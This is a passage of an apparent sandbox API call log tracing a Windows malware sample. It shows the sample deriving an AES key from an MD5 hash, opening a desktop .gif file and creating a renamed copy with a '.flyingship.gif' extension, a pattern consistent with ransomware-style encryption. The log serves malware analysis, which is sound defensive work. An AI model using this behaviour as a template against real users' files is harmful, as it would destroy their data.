lpMsg=0x87f114) returned 0 [0164.550] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0164.550] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.550] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.550] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.550] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.550] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.551] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.551] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0164.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.551] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.551] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.551] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.551] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.551] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.552] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.552] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.552] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.552] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.552] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.552] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.553] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0164.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.553] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0164.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.553] CryptDestroyHash (hHash=0x90ae18) returned 1 [0164.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\jlq6tymoaaqj7b5t.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0164.554] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.554] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0164.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0164.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0164.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0164.557] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk")) returned 0x10 [0164.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0164.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0164.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0164.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0164.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\jlq6tymoaaqj7b5t.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0164.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0164.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0164.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0164.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0164.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.559] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0164.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0164.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0164.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0164.561] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0164.561] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x8a16, lpOverlapped=0x0) returned 1 [0164.563] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0164.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a16) returned 0x9e5190 [0164.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0164.564] HeapFree (in: hHeap=0x8a0000, 